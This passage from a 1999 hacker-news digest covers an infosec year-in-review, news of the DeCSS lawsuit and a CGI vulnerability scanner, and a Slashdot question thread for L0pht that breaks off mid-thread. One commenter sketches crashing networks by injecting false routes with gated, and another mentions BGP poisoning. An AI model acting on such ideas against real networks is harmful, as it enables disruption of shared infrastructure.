Acceptable-Use Policies, Spam Wars (Corporate) 6.14.99 GartnerGroup surveyed 13,000 e-mail users around the world about their experiences with spam. The results were alarming: • 90 percent of the respondents received at least one junk e-mail per week. • 96 percent of those online for four years or more received junk e-mail at least once a week. • 33 percent got between six and 10 junk messages a week. • ISPs lose approximately 7 percent of their new users every year because of disgust with spam. • 40 percent of the respondents agreed that spam should be banned. • 25 percent said that spam should be regulated. • 3 percent of the respondents enjoyed it to some extent. Crypto Algorithm Weakness, Brute-Force Attacks 1.19.99 Under the direction of John Gilmore, a team from the Electronic Frontier Foundation (EFF) and Distributed.net cracked RSA Data Security’s DES Challenge III in 22 hours, winning a grand prize of $10,000. The decryption was a demonstration of the weakness of the DES and a blow against the U.S. government’s restrictions on the export of strong encryption products. 8.16.99 Adi Shamir (the "S" in RSA) of the Weizman Institute of Science in Rehovot, Israel, announced a successful brute-force attack on a 512-bit RSA private key; the cryptanalysis took seven months and required 292 computers at 11 different sites. However, Shamir also described the theoretical design for a $2 million cryptanalytic computer called "TWINKLE" that could apply brute-force attacks successfully to RSA keys of 512 bits or less in less than a week. New I&A Products (Tokens, Biometrics, Passwords) 1.01.99 Scientists in Britain established the uniqueness of ear-cartilage patterns and successfully prosecuted a burglar who put his ear to a window to detect sounds in the home he burgled. The thief murdered a 94-year-old woman and was consequently sent to prison for life. The police authorities had gathered 1,200 ear prints from volunteers by the end of 1998 and were hoping to begin collecting ear prints from suspects. Cryptography Exports From the U.S. 9.16.99 President Clinton issued a public letter addressed to Congress that pushed for passage of the Cyberspace Electronic Security Act of 1999 (CESA), which simultaneously deregulates most encryption software exports and provides for key escrow accessible to law enforcement agencies under warrant. Key Escrow/Recovery Laws 4.09.99 Andrew Fernandes of Cryptonym, a Canadian security firm, seems to have gone off half-cocked when he found a signing key for integrating cryptographic modules into Windows that was labeled "NSAKey." He and other conspiracy buffs interpreted this label to mean that there was somehow a back door into Windows that would allow the National Security Agency to integrate its own cryptographic modules into the operating system, yet have the version check out using digital signature verification. Such manipulations could generate versions of Windows with a back door for the NSA. Microsoft denied this interpretation and claimed that the key was "compliant with the NSA’s technical standards." A particularly clear discussion by Russ Cooper on NTBugtraq pointed out that the conspiracy theory was farfetched, but warned that it would indeed be possible for anyone to insert their own cryptographic modules into Windows and sign them using their own digital key. This would allow foreign crypto to run under Windows even without signature by Microsoft or approval by the U.S. Department of Commerce under the Export Administration Regulations (EARs). Privacy, Privacy Legislation 4.16.99 Kevin Cooke, development manager at Wired magazine, discovered that Microsoft’s Internet Explorer version 5.0 sends information to a Web site when the user bookmarks the site’s URL. In an interview with Chris Oakes of Wired, Microsoft product manager Mike Nichols said, "This is one of those things where we did not see the privacy issue when we were creating the feature. The feature doesn’t pose a super-huge risk. But Microsoft is looking at ways of modifying this feature in future releases." Apparently, the feature was designed to allow a Web site to supply an icon to be stored on the user’s system so any "Favorite" would be "branded" with that icon. 11.03.99 RealNetworks admitted that it had been collecting information about exactly what users of its RealJukebox player were listening to. The company did not inform users of the monitoring, and got hammered by its competitors, privacy advocates and many users. The company immediately changed its public privacy statement to let people know about the data collection function, and its spokesperson swore that the data had been aggregated so that no one could trace the specific interests of any one user. The company immediately apologized to the public for the concerns it had caused, and provided a patch to disable detailed reporting. Review in Review While this article gives you a glimpse of some of the significant developments in the field of infosecurity in 1999, there is no way to include an excerpt from each category of the full report. However, the full Infosec Year-in-Review database (see www.icsa.net) classifies hundreds of cases and issues spanning the field of information security. I encourage you to download the full PDF file in early 2000 for further review and discussion of the events of 1999. M. E. Kabay, Ph.D., CISSP (mkabay@icsa.net), is director of education for ICSA Labs. Footnotes: These malicious programs are called "virus/worms" because they integrate into the operating system (i.e.,they are virus like), but also replicate through networks via e-mail (i.e., they are worm-like). (return to top) See Bruce Schneier's Crypto Year-In-Review column for further discussion of 1999 cryptography events. @HWA 21.0 Butchered From Inside 7 12/27/99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by del0rean Butchered From Inside is an electronic publication of free speech and distribution. Issue #7 has just been released and it includes articles on spoofing, CCC Camp review, Gork, and WinnAMP. Sorry, it is in Italian only. Butchered From Inside http://www.s0ftpj.org/bfi @HWA 22.0 DVD Industry Sues over 500 Defendants in Anti-Piracy Lawsuit 12/28/99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Mazzic and Macki The DVD Copy Control Association, Inc., (DVD CCA) a non-profit trade association, has named 21 defendants and 500 John Doe's in a lawsuit filed in Santa Clara County Superior Court. The lawsuit alleges that the defendants misappropriated 'trade secrets' and 'proprietary information' and distributed the information via their web sites. The defendants, by posting DeCSS software, caused the illegal pirating of the motion picture industry's copyrighted content contained on DVDs. E-mail from the California law firm Weil, Gotshal & Manges, LLP notified the defendants late yesterday afternoon that they are seeking a restraining order from the court. DeCSS was independantly developed in Norway earlier this year. The software allows the playing and copying of DVD movies on Linux computer systems. Apparently the mirroring of the DeCSS software was enough to turn ordinary people into criminals who want to destroy the entire motion picture industry and ruin all that is good in the world. (I would really like to know how a county court can process an injunction that is valid in 12 states and eleven countries?) HNN's copy of the legal complaint http://www.hackernews.com/special/1999/dvdinjunction.html 2600.com - One of the defendants http://www.2600.com/news/1999/1227.html DeCSS Defense Site http://www.lemuria.org/DeCSS/ DVD Copy Control Association http://www.dvdcca.org/dvdcca/index.html @HWA 23.0 Web Based CGI Vulnerability Scanner Released 12/28/99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by webmaster Check your web site (or anyone else's) for 64 known CGI vulnerabilities in seconds. If you have new vulnerabilities not included in the scanner you can submit them here mailto:webmaster@digital-harmony.com Web Based CGI Scanner http://www.nobullshit.org/ @HWA 24.0 L0pht Interviewed by Slashdot ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Joey L0pht Heavy Industries, the premier hacker think tank, has been honored by Slashdot as the next victim in their community interview process. So far many of the proposed questions are very interesting and should illicit some great responses. Ad your voice to the fray. Slashdot.org http://slashdot.org/article.pl?sid=99/12/27/1015213&mode=thread I've reproduced the 'interview' here but the format is a real mess and i'd have to spend hours editing it, so just follow along best you can or go to the link it should lead you to the archived version on Slashdot, here it is unformatted. - Ed This discussion has been archived. No new comments can be posted. Shutting down the Internet (Score:3, Interesting) by papo (papo@uninet.com.br) on Monday December 27, @12:04PM EST (#1) (User Info) You said in an interview that it's possible to shut down all the Internet. How you possibly might do that? With a DoS attack in some routers or by taking command of some servers in the principal backbones of the USA? "Learning, learning, learning - that is the secret of jewish survival" -- Ahad A'Ham Re:Shutting down the Internet (Score:1) by merky1 on Monday December 27, @12:07PM EST (#5) (User Info) If I can add to this.. What event would cause you to take down the internet? --WooooHoooo-- Re:Shutting down the Internet (Score:3, Informative) by jd on Monday December 27, @12:16PM EST (#20) (User Info) That one's easy. Very few routers have authoritive checks set up. Simply fire up a router such as gated and have it inject false routes into the net. Have the backbone located at the South Pole, for instance. The UK network's been crashed dozens of times, by this. Usually by poor network administration, or faulty software, but that's just details. What an admin can do through ignorance, I'm sure crackers could do by design. Re:Shutting down the Internet (Score:0) by Anonymous Coward on Monday December 27, @02:29PM EST (#111) hmm... something about poisoning BGP tables? Re:Shutting down the Internet & a question 2 L0pht (Score:1) by EchoMirage on Monday December 27, @03:55PM EST (#136) (User Info) Many/most people that laughed at this claim forget that computer networks operate almost identically to power grids. By taking out all the Cisco routers, for instance, you might only take 30%-50% of the networks, but as other networks attempt to fail over and become dependant on the still live networks, those networks, routers, and servers become overloaded with the traffic and start to fail. It's a domino effect. This is the reason when someone with a backhoe cuts a major cross-continental fibre line, the rest of the Internet, especially in nearby affected areas, slows to a crawl because other networks failing over to another backbone creates a strain on those lines and equipment. Now, for my question to L0pht: What, in terms of network design, do you see as the single biggest threat to security? Re:Shutting down the Internet & a question 2 L0pht (Score:0) by Anonymous Coward on Tuesday December 28, @08:42PM EST (#222) the lack of attention to detail. Re:Shutting down the Internet (Score:0) by Anonymous Coward on Monday December 27, @01:38PM EST (#82) I think there is a better question. First, the claim is a bit of a braggadocios, it's easy to talk and the statement is pretty vague to begin with. That is sort of the nature of cracking community. I'm not going to say that it's not possible, corrupting router tables is a very good place to start and there are probably a few computing centers wher a good DoS attack could seriously hamper internet traffic but those aren't really crashing things and they usually don't last that long. There is a huge difference between cutting down the performance and making lots of traffic go through smaller pipes and crashing or stopping the net, the bigger it becomes the more reliable it becomes. As more and more infrastructure become dependent on the net, the net becomes more and more connected and more and more security is placed on more important pieces. Companies like AOL,TCI/ATandT,Qwest,mindspring,Amazon, etc... have substantial financial insentive to protect the net, secure their servers and network infrstructure, and have staff on duty ready to catch and fix problems as soon as they happen. 15 years ago, you could have easily attacked one router and substantially crippled the net, you could have went after 5 or 10 and pretty much shut it down. It is so much more connected today than it was then, you can cut a couple of major channels and there are others that stay up. There is no longer one east-west network pipe, there are numerous pipes and it keeps getting more and more connected. Take that major power-outage that cut power to most of the western US and parts of Canada a couple years back, the internet didn't blink. If you do believe that you can crash it, how much longer do you think it will stay that way? Or do you even think that it is progressing towards a much more stable and crash-resistant infrastructure, please explain. Then on the ethics side (sorry to over shoot the one q per post rule) if you do believe you can do it, what have you done to get the problems fixed or at least publicize the methods so they can be corrected for? I would think that it would be good for business to take credit for stopping a potentially huge network shutdown. Re:Shutting down the Internet (Score:0) by Anonymous Coward on Tuesday December 28, @08:50PM EST (#223) I have experienced the provider's, "...substantial financial insentive to protect the net, secure their servers and network infrstructure..." And I don't like it, at all. I had one of the listed providers with a misconfigured (or 0wned) that was allowing source routed packets to my machines. The, " ...staff on duty ready to catch and fix problems as soon as they happen... " , was quite willing to disable source routing, after I informed them of the invalid packets. I think the main lesson here is: When you assume, it makes an ASS out of U and ME. Re:Shutting down the Internet (Score:0) by Anonymous Coward on Monday December 27, @01:38PM EST (#84) Read this comment. Re:Shutting down the Internet (Score:1) by batz (batz@vapour.net) on Tuesday December 28, @06:11PM EST (#221) (User Info) http://www.vapour.net Appologies for the flagrant plug, but this was covered indepth at Blackhat '99 in Las Vegas. All the presentations are online, including mine, which detailed problems with the way that BGP is designed, implemented and configured. It's all available at www.blackhat.com They made this claim almost 2 years ago. I wouldn't speak for them, but it's kinda like asking yelling "Ziggy!" at a David Bowie concert. -- batz Chief Reverse Engineer Superficial Intelligence Research Division Defective Technologies Y2k Hacking (Score:3, Interesting) by merky1 on Monday December 27, @12:04PM EST (#2) (User Info) Do you agree with the President's plea to cease hacking activities for Y2K, and do you think it will have an adverse affect? "Those [filthy|pagan|heathen|whiny] americans, I'll show them....." --WooooHoooo-- Job offers (Score:1) by eyeball on Monday December 27, @12:07PM EST (#6) (User Info) http://www.spacehaven.com Whenever the subject of securing our web servers comes up at work, someone inadvertently says "We should hire one of those L0pht guys." As if you have nothing better to do than to work for a starving second-rate e-commerce IPO. My question is: Do you get job offers like this? If so, how does it feel? Do you refer them somewhere? I'm looking for Sara Shelton from the Oregon/Washington area. Please email me if you know her. Re:Job offers (Score:0) by Anonymous Coward on Monday December 27, @12:59PM EST (#54) "How does it feel?" What a bizarre question. Well, let me give an answer. I'll answer it in as much detail as possible so you can really get a good sense about what a job offer from a second-rate IPO e-commerce outfit feels like. Pay close attention. It's best to read this twice, as it will take at least two readings for your imagination to kick in. (I say this because from the sound of the question -- asking how a job offer feels -- I get the sense that (a) you're still in college and have not had a job offer, (b) are working at a job and are a little slow, or (c) are truly a blockhead and have no idea how the real world works and that, well, a job offer doesn't feel like much -- or at least not much that is easily quantifiable.) So, this is what it feels like: It feels all tingly. It feels like when you're in the ocean and you've been swimming out away from the beach for about 20 minutes, and then suddenly you turn back toward shore, swim for another 20 minutes, and then get up on the beach and walk to the beach house for a nice, cool Pina Colada. That's about the closest I can describe it. Well, okay, not entirely true. It feels like when you've been standing on a train platform on a cold morning and then the train comes whooshing by and kicks up a tiny pebble which zings toward your face, hits your glasses, cracks the lens, and then zigs to the right and dings your nose. It feels the way your nose feels after the pebble has fallen back to the platform and you're standing there -- standing wearing your goose-down winter coat, your thick gloves, and carrying your briefcase -- and you must walk up the steps into the train vestibule with a horde of other commuters. The ding from the pebble stings -- but only a little bit -- but you're more worried about whether or not the pebble caused your nose to bleed (you can't tell because you have gloves on) -- but you're self-conscious since people are looking at you, and you're not sure if they're looking at you because your glasses are cracked, because the side of your nose is bleeding, or because you look a little shell-shocked because you just got whipped by a pebble shot up from the steel wheels of the train. That's about the best way to describe how the job offer from a second-rate outfit feels like. Re:Job offers (Score:1) by eyeball on Monday December 27, @02:28PM EST (#109) (User Info) http://www.spacehaven.com Haha. Wow, that good? I wonder how it feels when the stock options kick in. :) I'm looking for Sara Shelton from the Oregon/Washington area. Please email me if you know her. Re:Job offers (Score:1) by |deity| on Monday December 27, @08:49PM EST (#181) (User Info) I know this is a little off topic. I'm a student, working on a degree in computer science I would like to work in the security field where should I start? What kind of things should I be doing to prepare myself for a job in this field. I've been programming for about nine years in various languages. Re:Job offers (Score:1) by eyeball on Monday December 27, @09:13PM EST (#182) (User Info) http://www.spacehaven.com 2 pieces of advice: 1) start as a network/sysadmin and prove yourself 2) don't take advice from anyone, especially mine :) I'm looking for Sara Shelton from the Oregon/Washington area. Please email me if you know her. Re:Job offers (Score:0) by Anonymous Coward on Wednesday December 29, @08:02AM EST (#228) Be a sys admin, do a security audit (hack your servers) and tell your managers that they are vunrable, they will fear you (if they dont fire you) then tell them they sould have a full time security tester (Then make that your job title). Which do you consider more dangerous (Score:5, Interesting) by Gleef (gleef@capital.net) on Monday December 27, @12:09PM EST (#7) (User Info) about:mozilla Which do you consider more dangerous to personal liberties on the Internet, national governments or multinational corporations, and why? ---- Open mind, insert foot. Um (Score:1) by Synn on Monday December 27, @12:10PM EST (#8) (User Info) How the frag do you pronounce L0pht? And what the hell does it mean? Somebody write me a perl warez filter for pete's sake. All this kewl l33t drek is driving me insane. Re:Um (Score:1) by GeorgeH (georgeah@nOsPaM.home.pLeAsE.com) on Monday December 27, @12:19PM EST (#25) (User Info) http://slashdot.org/comments.pl?sid=GeorgeH Ell Zero Pee Aitche Tee L 0 P H T : PH = F (in crazy english) L0FT : 0 = O (in crazy 1337 5p33k) loft 1 : an upper room or floor : ATTIC 2 a : a gallery in a church or hall b : one of the upper floors of a warehouse or business building especially when not partitioned c : HAYLOFT 3 a : the backward slant of the face of a golf-club head b : the act of lofting 4 : the thickness of a fabric or insulating material (as goose down) -- I hate spelling and grammar nazis. Re:Um (Score:2) by bbk (insert@pithy.email.obfuscation.here) on Monday December 27, @12:22PM EST (#29) (User Info) l0pth is pronounced "loft" - synonomous with attic. l0phters are people who dumpster dive looking for computer parts, usually in large companies trash bins, and carry the parts back to their l0pht where they use them. I've l0phted a couple monitors and cases from my ever so friendly ECE department before... It's a great way to get an eclectic computer collection for very little! Re:Um (Score:2) by BradyB (bradyb@mailandnews.spam.com) on Monday December 27, @12:24PM EST (#33) (User Info) I always thought that L0pht stood for LOW PHAT as in Low fat as in high speed low drag. Good is never good enough when you dream of being the best. Just out of curiosity... (Score:1) by Ater (ater@nospam.goatse.cx) on Monday December 27, @12:10PM EST (#9) (User Info) http://www.redrival.com/ater Where did you guys come up with the name, "the l0pht?" Does the 0 in it (as opposed to an O) have some special significance? --- Do you want to change your name to Homer Jr.? The kids can call you Ho-Ju! --- 0 is Ø. (Score:0) by Anonymous Coward on Monday December 27, @05:42PM EST (#158) Well - According to l0pht's logo. L0pht is actually written LØpht. Ø is scandinavian. Re:0 is Ø. (Score:1) by Levine (bourgon@bigfoot.com) on Monday December 27, @06:12PM EST (#162) (User Info) Most CS people write their zeros with a line through it. Levine Re:0 is Ø. (Score:1) by myconid (myconid@deletethispart.sover.net) on Monday December 27, @07:43PM EST (#178) (User Info) http://www.myconid.com Unless they have ever taken a math class in their life and realise 1-1 = Slashed 0 isnt true :-) SB. (C) 2000 Re:0 is Ø. (Score:0) by Anonymous Coward on Tuesday December 28, @02:32AM EST (#202) oh oh, let the pre-calculus student in high school answer that one, Ø is nullset, or is that with the slash in the opposite direction? well, as someone put it in another post, do not take anyone's advice, especially mine Re:0 is Ø. (Score:1) by Levine (bourgon@bigfoot.com) on Wednesday December 29, @09:26PM EST (#236) (User Info) CS people differentiate between an O and a 0 (an 'oh' and a zero) by slashing the zero. If it's wrong, so be it. It still happens. Levine Re:0 is Ø. (Score:1) by generic (larry@[n0sp4m]adm3.com) on Monday January 03, @01:36PM EST (#239) (User Info) or is it theta? Future of Security (Score:0) by Anonymous Coward on Monday December 27, @12:10PM EST (#10) What do you think will be the future of computer security ? Encryption ? I don't think it'll be enough... What we'll be doing to protect our data ? Private wireless networks (Score:3, Interesting) by rise (jconway@ipopros.com) on Monday December 27, @12:12PM EST (#12) (User Info) http://www.ipopros.com The L0pht has been involved in independent wireless networking reasonably heavily. What do you see as the most important discoveries/protocols/designs for the next few years? Do you forsee an opportunity for the hardware hacking community to open up the airwaves in the same way Linux & OSS has opened up operating systems and tools? L0phtCrack (Score:2) by OnyxRaven (onyxraven@nospamhere.netscape.net) on Monday December 27, @12:13PM EST (#14) (User Info) http://www.prolynx.com/onyxraven/ At work we recently purchased a copy of L0phtCrack (Guess what - it has saved many many hours of work for me especially!) - for $99? Are you guys making a killing off of this tool or what? ~Nth Dimension~ Distributed Computing (Score:3, Interesting) by jake_the_blue_spruce on Monday December 27, @12:13PM EST (#16) (User Info) Moore's law is that computing power doubles every eighteen months. At the same time, parallel processing and distributed computation ( Cosm & Distributed.net) are becoming increasingly common. This leads to an abundance of cheap computing power, enabling brute force attacks on secure systems. In light of these developments, do you see username/password pairs being replaced by anything more resistant to such brute computing force? "There's so much left to know/ and I'm on the road to find out." -Cat Stevens Re:Distributed Computing (Score:1) by jake_the_blue_spruce on Monday December 27, @12:15PM EST (#18) (User Info) Shoot. Cosm is at http://cosm.mithral.com/. I thought I checked that link. "There's so much left to know/ and I'm on the road to find out." -Cat Stevens Pronounciation (Score:2, Interesting) by RAruler (cannabis at home dot com) on Monday December 27, @12:14PM EST (#17) (User Info) At one point I thought it was "low-fight" but somewheres I remember it being said as "loft" which would make more sense as L=L 0=O PH=F T=T LOFT This post uses only 100% recycled electrons. Re:Pronounciation (Score:1) by norkakn on Monday December 27, @10:06PM EST (#189) (User Info) Hey, better than me... for a while i thought it was "'low fat' heavy industries" with the pun... but then i actually heard the name somewhere *gasp* jdobbie@kmfms Re:Pronounciation (Score:1) by splinter (dull_boy_jack@hotmail.com) on Tuesday December 28, @01:13AM EST (#200) (User Info) http://www.deimos.org read your douglas adams, fool. Re:Pronounciation (Score:0) by Anonymous Coward on Tuesday December 28, @01:09PM EST (#218) well, a rather good interview of the crew, 4th Jan 99 BBC2 ( UK ) had it pronounced " the loft" as the pictures proved, their "den/lair" ( cant think of a better word ) it is infact a loft, in Boston. I hope this proves how, but I wonder why ? Why, ya think it was Level zero Phreaking Hacking Team ? Future Products (Score:1) by MoOsEb0y (mooseboy@vqf.com) on Monday December 27, @12:15PM EST (#19) (User Info) What products and or projects are you considering in the future? Also, what happened to the wireless networking you were planning (and made a few steps to)? I have often considered setting up something similar to this on a local scale for a few friends. But I think it'd be awesome to be able to be free of US Worst for my internet service. advisories (Score:1) by krog (gamache-at-mit.edu) on Monday December 27, @12:16PM EST (#21) (User Info) http://web.mit.edu/gamache/www you haven't released any security advisories lately. where do you get your nitrous? can i have some? Re:advisories (Score:1) by barleyguy on Monday December 27, @12:32PM EST (#39) (User Info) Nitrous is available as a product called "whip-its". It's manufactured for making whipped cream, but is usually sold at adult bookstores. I'm not sure exactly why.... --- istream >> ostream "We all scream for ice cream!"; Re:advisories (Score:0) by Anonymous Coward on Monday December 27, @05:04PM EST (#152) http://www.onepercent.com/whipit.html That's where you can get your nitrous :) --huge coward Things to come... (Score:0) by Anonymous Coward on Monday December 27, @12:18PM EST (#23) Do you have a guesstimate as to when Operating Systems and protocols will make Information Security a non issue (from and attack and penetration perspective)? I have discussed this with my colleagues quite a bit and none of us can really say. This is not bait for Microsoft jokes, either. Developers may eventually wisen up, the day that I hang my A/P hat and retire to a desk job because of this evolution is inveitable, but thankfully not in sight. I would appreciate some comments on this matter... -jcw Coagulation (Score:1) by Raffy (rafe.digitaldiscipline@com) on Monday December 27, @12:19PM EST (#24) (User Info) http://www.digitaldiscipline.com L0pht- As with any of the well-known infosec groups (you, cDc, &c), it's always a far-flung collective of folks who coalesce and make things happen. How did you meet and decide, "hey, we have common goals and interests, let's do this as a team"? Rafe V^^^^V Opinions expressed by the author may not actually exist in the wild. Re:Coagulation (Score:1) by Synic (synic@linuxfreak.com) on Monday December 27, @03:13PM EST (#129) (User Info) http://www.lanparty.com The l0pht and cDc people live in the same city. The l0pht people live in the same building. :) (as far I as I remember) This info is on their web page. www.l0pht.org i think. nope. (Score:0) by Anonymous Coward on Monday December 27, @05:04PM EST (#151) some cDc members are in texas, some are in california. One seems to spend a fair bit of time in Canada, although I don't know if he lives there. The l0pht members (including the mudge, who is also a cDc member) live in boston. The net: strip mall or unlimted human potential? (Score:5, Insightful) by garagekubrick (domu13@yahoodotcom) on Monday December 27, @12:19PM EST (#26) (User Info) http://lifs.org.uk The halcyon days of the net are gone. With ubiquity - the underground vanishes. Is it well on its way, with people like the CEO of Amazon being worshipped by the mainstream press, to becoming an enormous cyber strip mall, marketing tool, PR exercise in control of perception... Or is there still an underground? Does it still have a potential to be the one true medium with liberation? Will governments and coroporations end up controlling it? Cause they are winning small, important victories relentlessly... "I am not a gun" ,,, (Score:2, Interesting) by Signail11 on Monday December 27, @12:20PM EST (#27) (User Info) Considering the availability of easy to use, secure, persistent, pseudoanonymous nyms (http://www.freedom.com) and the increasing role that electronic commerce plays in our economy, what privacy and security concerns do you anticipate moving to the forefront of attention as this rapidly changing technology evolves? Actually it's http://www.freedom.net (Score:1) by LiNT_ on Monday December 27, @01:35PM EST (#77) (User Info) See above IPSEC key debate (Score:1) by Ruzty on Monday December 27, @12:21PM EST (#28) (User Info) http://www.moosehead.com/ What is your take on the quashing of the use of photuris, for IPSEC keyserver use over the open to attack isakmp, by the IETF? "Try to spend the next 30 seconds not thinking about a blue eyed polar bear." -Feodor Dostoevsky A quickish question (Score:3, Interesting) by jd on Monday December 27, @12:22PM EST (#30) (User Info) The Internet is fragmenting (eg: IPv4 vs. IPv6, Internet 2) and those parts that do have any awareness of security are now beginning to take it seriously (eg: IPSec, SSH). Many other parts are brain-dead, insecure and incoherent. How do you see things evolving, from this unholy mess? A question about L0pht constituents: (Score:3, Interesting) by NateTG on Monday December 27, @12:23PM EST (#31) (User Info) What are the non-computer hobbies of the l0pht crew? I suppose that this is a sort of "celebrety interview" question, but I'm curious. Name Dropping Asswipes (Score:2, Interesting) by Anonymous Coward on Monday December 27, @12:24PM EST (#32) I meet a lot of "white hat" security types in my job. Every so often, I one of these guys goes into name dropping mode and starts talking about how chummy he is with Mudge. Once I had one of them tell me how he had contacts with the "low fat" guys (although he hadn't heard it pronounced as "loft"). What is it like to have your name(s) dropped by potentially thousands of really cluesless people who you might never even meet? Somebody else would do this, so I'll do it first (Score:0) by Anonymous Coward on Monday December 27, @12:26PM EST (#34) What do you propose as a solution to the whole Q1 OSS cheating debacle? Human interest stuff (Score:1) by Errant Knyght (knyght@excite.com) on Monday December 27, @12:27PM EST (#35) (User Info) Now I know that Mudge has a painting (can't remember who by) hanging around, and I was wondering what artist everyone at L0pht enjoys as well as composers (if any there are into classical music). Defensive Design Methodologies (Score:4, Insightful) by FuriousJester (peterman at the temple of funk) on Monday December 27, @12:29PM EST (#36) (User Info) I read something to the gist of this recently: "The difficulty with computer security is that programmers write code to allow a course of action, not to prevent another. In order for computer security to become a reality, the design methodology must be changed." Any programmer worth their check does program defensively. Certain languages support the writing of "safe code" more easily than others. It requires less fore-thought to program defensively in Java than it does in C. The results, however, will not be as fine tuned. Any methodology for designing and producing safe code must take this, the experience of those implementing it, the environments the product could be used int, into account. L0pht has compromised many designs. Have you seen any design/impl (hardware or software) methodologies that yield more secure results than others? Could you give reference to them? In my experience, it has always been a matter of refinement. Security is relative. Nuclear weapons can destroy the world, if used properly. -David Byrne Windows API (Score:3, Interesting) by IRNI (irni@irni.net) on Monday December 27, @12:31PM EST (#37) (User Info) http://www.irni.net If the windows API was opened because of the DOJ trial, what would you do? A) Exploit every weakness from here to kingdom come, thereby propelling linux to the forefront. B) fix everything and tell microsoft so they can make the changes show up in a new release C) Do A) and grin real big and giggle lots D) Other | Please Specify ___________________ Re:Windows API - Flawed Logic (Score:1) by Charlatan (jmutter at ds dot net) on Monday December 27, @04:16PM EST (#143) (User Info) http://www.freebsd.org/ f the windows API was opened because of the DOJ trial, what would you do? A) Exploit every weakness from here to kingdom come, thereby propelling linux to the forefront. First, I don't understand how exposing specific Windows vulnerabilities would propel 'linux to the forefront'. Your statement doesn't support your conclusion. Anyhow... (and more on topic with your original post) if you pay attention, every exploit is closely followed by a fix. Exposing weaknesses in Windows would really just help, in the long run, to make it a more viable alternative to UNIX. Re:Windows API (Score:0) by Anonymous Coward on Monday December 27, @06:40PM EST (#170) First I agree with the previous post that exposing weaknesses in windows doesn't have a strong connection to "propelling linux to the forefront". Also if anyone is seeking to find flaws in windows they probably wouldn't stoop that much lower if they simply decompiled it themselves illegally. Question: (Score:1) by sboss (scott at sboss dot net) on Monday December 27, @12:31PM EST (#38) (User Info) Do you think there will be any security in the internet of the future? There seems to be more and more security holes (or at least we are finding more). Plus does encryption or digitially signing data help or hender the net? Thanks Scott Scott C{E,F,O,T}O sboss dot net email: scott@sboss.net Regret / Useful Software / Orwellian CPUs (Score:2, Interesting) by MattW (ma++@ender.com) on Monday December 27, @12:34PM EST (#40) (User Info) I have a couple questions. Choose whatever you like. * The silicon valley is froth with IPOs. A huge opportunity exists even in Boston, if you were attached to the city. Do you regret not putting more into a commercial enterprise that could have netted you the millions some people are getting? If so, would you trade your fame in this community for it if you could? * L0pht spends an enormous amount of time hacking on other peoples' equipment, cracking and analyzing other peoples' software. Without meaning to denigrate such useful activities, do you ever want to stop it for a while and dedicate yourself to the creation of something innovative and positive? * Somewhere in the future, drowning in gigahertz, manufacturers turn to adding security to their CPUs. CPUs have decryption modules which stop the CPU from running any code not specifically signed and encrypted for your CPU. Your machine (or cpu) would come with a disk or cdrom with a public key you'd provide to vendors (probably on a web page) that would be used to "complete" a build of software that was sold to you, and lock it onto your CPU only. Every piece of software will have a known desination and a known source. Piracy will be a thousand times harder. Viruses will be wiped out by applying this technology to documents and software alike. Is this the future? * I see the patent situation forcing software to inevitably go one way or the other: it will either be written only by corporations with tons of money and patents, and be commercial (and by judgement-proof pauper-programmers who have nothing to sue away from them), or the USPTO will suffer through a massive regulation change, and thousands of software/algorithm/ business-model patents will be swept away, along with more easy way to review a given patent's "nonobvious"-ness. Where do you think this tragedy is headed? What does L0pht mean? Maybe an answer (Score:1) by BradyB (bradyb@mailandnews.spam.com) on Monday December 27, @12:35PM EST (#41) (User Info) Well I never really put much thought in to it, but here goes. L0pht Heavy Industries. Perhaps it means Low Phat as in Low Fat , Heavily Used as in high speed low drag industries. Good is never good enough when you dream of being the best. evolution of the network (Score:1) by kootch on Monday December 27, @12:35PM EST (#42) (User Info) http://students.hamilton.edu/1999/dkutcher with the local networks expanding from one solitary computer, to 20 computers connected in a room, to wireless devices also now able to connect to large databases and networks, how do you see the security industry (is it considered an industry) responding to these changes and do you forsee any interesting problems arising? How's the wireless 'net project going? (Score:3, Interesting) by Anonymous Coward on Monday December 27, @12:35PM EST (#43) I was digging around the l0pht web site one day and read up on the wireless project you guys were doing trying to make use some old UHF equipment and seeing how far you could spread a free wireless network. So what's the current status of that project? pls answer the q above (Score:0) by Anonymous Coward on Monday December 27, @02:18PM EST (#101) Just recently on slashdot there was talk of large wireless networks using wavelan. I'm especially interested in hearing about the status of guerilla.net. I'm sure answering the question i'm replying to would further the project and get more people involved. thanks Re:How's the wireless 'net project going? (Score:0) by Anonymous Coward on Monday December 27, @06:25PM EST (#163) Packet radio systems have existed for years, invented by Radio Amatures, there is nothing new here. Packet radio networks exist on HF, VHF and UHF. what's new? Usually the speed of such a network does not exceed 9600baud (kbits/s), especially when using HF, when you transmit your data from one point to another on the globe. Internet thru packet radio... NOT! (Score:1) by Inferno (inferno[at]teleport[dot]com) on Tuesday December 28, @03:59AM EST (#204) (User Info) The amateur radio packet network is governed by the FCC just like any other amateur radio communications mode. The regulations can be difficult to get around, such as the rule that you MUST have an amateur radio license to transmit anything on an amateur radio frequency. This would put a kink in using IRC for one. You would only be able to converse with valid amateurs, which would be impossible to guarantee. I looked into setting up a wireless amateur radio packet network at school, as I admin a svr that is currently connected to the Internet AND the packet radio network. I couldn't legally use IRC thru the radio link because the folks I would chat with do not have FCC amateur radio licenses. 'Bout the only thing this would come in handy for would be remote system administration, but then you would have to look at the fact that packet radio is an OPEN mode of communication. Anyone with a TNC and radio receiver would be able to monitor what was going on. And forget about using SSH or some similiar mode of secure shell access -- the FCC forbids the use of encryption. :( Question (Score:1) by Necroleptic (auto33629@hushmail.com) on Monday December 27, @12:39PM EST (#45) (User Info) http://users.bergen.org/~johsan What are your opinions on "script kiddies" and your propogation of these people? Don't you believe that people who would want to be hackers should learn through experience, much like yourselves? Security Lint (Score:3, Interesting) by Omniscient Ferret (jyoung@cs-sun1.truman.edu) on Monday December 27, @12:39PM EST (#46) (User Info) http://cs-sun1.truman.edu/~jyoung/index.htm For assurance, before installing software on a secure-as-plausible machine, I would love to have an automated for security problems, such as buffer overflows. So, how is the development of SLINT progressing? Are you still planning to release it? Re: Security Lint 